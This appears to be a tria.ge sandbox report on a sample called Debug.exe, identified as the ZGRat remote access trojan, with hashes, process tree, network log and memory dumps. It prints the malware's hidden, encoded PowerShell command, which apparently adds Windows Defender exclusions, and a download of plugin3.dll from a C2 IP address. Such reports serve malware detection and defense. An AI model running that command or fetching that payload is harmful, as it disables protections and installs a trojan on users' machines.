Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

Debug.exe

windows7-x64

10

Debug.exe

windows10-1703-x64

10

Debug.exe

windows10-2004-x64

10

Debug.exe

windows11-21h2-x64

10

Resubmissions

03/01/2024, 11:37 UTC

240103-nrgycafdf4 10

03/01/2024, 11:18 UTC

240103-nd9q7scgfm 10

Analysis

  • max time kernel
    159s
  • max time network
    173s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    03/01/2024, 11:37 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Debug.exe

  • Size

    631KB

  • MD5

    eec03d362a4c66fe6ac8064ae68bda50

  • SHA1

    8aa051b9c7f201eb9504fb7023bbc5ffa2458293

  • SHA256

    cd2cc1403cb829e7d7454a3a80d9875834bd3b0837e56493369f2d842bf3f569

  • SHA512

    e6f07b5171fee9fa534f57376aaf6061e541da4ad9cee2e50b3d2ee3eed7cd2d0ed2942a479e8887dc7e4247e969b081b5ebef758854e7c62be35e2af49a8f2d

  • SSDEEP

    12288:vEZR29MfzdOwMI5F09MyMeWR+KSS2g/Pd35/K9TGH4CaxJDua:MZR29Mfzdu6LyZTIdJ/K98n6u

Score
10/10
zgratrat

Malware Config

Signatures

  • Detect ZGRat V1 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Executes dropped EXE 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Debug.exe
    "C:\Users\Admin\AppData\Local\Temp\Debug.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2092
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABlAGYAYQB1AGwAdABcAE4AYQBtAGUALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEQAZQBmAGEAdQBsAHQAXABOAGEAbQBlAC4AZQB4AGUA
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3656
  • C:\Users\Admin\AppData\Roaming\Default\Name.exe
    C:\Users\Admin\AppData\Roaming\Default\Name.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2960
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5052

Network

  • flag-us
    DNS
    154.246.92.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    154.246.92.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    154.246.92.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    154.246.92.91.in-addr.arpa
    IN PTR
  • flag-bg
    GET
    http://91.92.246.154/plugin3.dll
    RegSvcs.exe
    Remote address:
    91.92.246.154:80
    Request
    GET /plugin3.dll HTTP/1.1
    Host: 91.92.246.154
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Wed, 03 Jan 2024 11:39:02 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    Last-Modified: Fri, 15 Dec 2023 15:11:23 GMT
    ETag: "23f2d8-60c8dd03f4af7"
    Accept-Ranges: bytes
    Content-Length: 2355928
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
  • flag-us
    DNS
    114.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    114.110.16.96.in-addr.arpa
    IN PTR
    Response
    114.110.16.96.in-addr.arpa
    IN PTR
    a96-16-110-114deploystaticakamaitechnologiescom
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    7.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    7.173.189.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    7.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    7.173.189.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    194.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    194.178.17.96.in-addr.arpa
    IN PTR
    Response
    194.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-194deploystaticakamaitechnologiescom
  • flag-us
    DNS
    194.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    194.178.17.96.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    178.223.142.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    178.223.142.52.in-addr.arpa
    IN PTR
    Response
  • 91.92.246.154:39001
    RegSvcs.exe
    606 B
     744 B
     8
    7
  • 91.92.246.154:80
    http://91.92.246.154/plugin3.dll
    http
    RegSvcs.exe
    25.3kB
     1.1MB
     522
    812

    HTTP Request

    GET http://91.92.246.154/plugin3.dll

    HTTP Response

    200
  • 8.8.8.8:53
    154.246.92.91.in-addr.arpa
    dns
    144 B
     132 B
     2
    1

    DNS Request

    154.246.92.91.in-addr.arpa

    DNS Request

    154.246.92.91.in-addr.arpa

  • 8.8.8.8:53
    114.110.16.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    114.110.16.96.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    216 B
     158 B
     3
    1

    DNS Request

    11.227.111.52.in-addr.arpa

    DNS Request

    11.227.111.52.in-addr.arpa

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    7.173.189.20.in-addr.arpa
    dns
    142 B
     157 B
     2
    1

    DNS Request

    7.173.189.20.in-addr.arpa

    DNS Request

    7.173.189.20.in-addr.arpa

  • 8.8.8.8:53
    194.178.17.96.in-addr.arpa
    dns
    144 B
     137 B
     2
    1

    DNS Request

    194.178.17.96.in-addr.arpa

    DNS Request

    194.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    178.223.142.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    178.223.142.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dilwwfav.53k.ps1
    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Default\Name.exe
    Filesize

    631KB

    MD5

    eec03d362a4c66fe6ac8064ae68bda50

    SHA1

    8aa051b9c7f201eb9504fb7023bbc5ffa2458293

    SHA256

    cd2cc1403cb829e7d7454a3a80d9875834bd3b0837e56493369f2d842bf3f569

    SHA512

    e6f07b5171fee9fa534f57376aaf6061e541da4ad9cee2e50b3d2ee3eed7cd2d0ed2942a479e8887dc7e4247e969b081b5ebef758854e7c62be35e2af49a8f2d

    Download Submit

  • memory/2092-4-0x000002ACAF810000-0x000002ACAF866000-memory.dmp

    Filesize

    344KB

    Download

  • memory/2092-2-0x00007FFFFA280000-0x00007FFFFAC6C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2092-63-0x00007FFFFA280000-0x00007FFFFAC6C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2092-5-0x000002ACAF870000-0x000002ACAF8BC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2092-6-0x000002ACAF8C0000-0x000002ACAF914000-memory.dmp

    Filesize

    336KB

    Download

  • memory/2092-67-0x00007FFFFA280000-0x00007FFFFAC6C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2092-0-0x000002AC95290000-0x000002AC95332000-memory.dmp

    Filesize

    648KB

    Download

  • memory/2092-1-0x000002ACAF670000-0x000002ACAF772000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/2092-3-0x000002ACAF790000-0x000002ACAF7A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2960-71-0x000002227E000000-0x000002227E010000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2960-73-0x000002227E000000-0x000002227E010000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2960-70-0x00007FFFFA280000-0x00007FFFFAC6C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2960-74-0x000002227E000000-0x000002227E010000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2960-78-0x00007FFFFA280000-0x00007FFFFAC6C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/3656-12-0x0000017C3FF30000-0x0000017C3FF40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3656-11-0x00007FFFFA280000-0x00007FFFFAC6C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/3656-56-0x0000017C3FF30000-0x0000017C3FF40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3656-33-0x0000017C3FF30000-0x0000017C3FF40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3656-19-0x0000017C40260000-0x0000017C402D6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/3656-15-0x0000017C400B0000-0x0000017C400D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3656-13-0x0000017C3FF30000-0x0000017C3FF40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3656-62-0x00007FFFFA280000-0x00007FFFFAC6C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/5052-76-0x00007FFFFA280000-0x00007FFFFAC6C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/5052-77-0x000001C7F1E30000-0x000001C7F1E40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5052-79-0x000001C7F1E30000-0x000001C7F1E40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5052-80-0x000001C7F1E30000-0x000001C7F1E40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5052-81-0x00007FFFFA280000-0x00007FFFFAC6C000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/5052-82-0x000001C7F1E30000-0x000001C7F1E40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5052-83-0x000001C7F1E30000-0x000001C7F1E40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5052-84-0x000001C7F1E30000-0x000001C7F1E40000-memory.dmp

    Filesize

    64KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.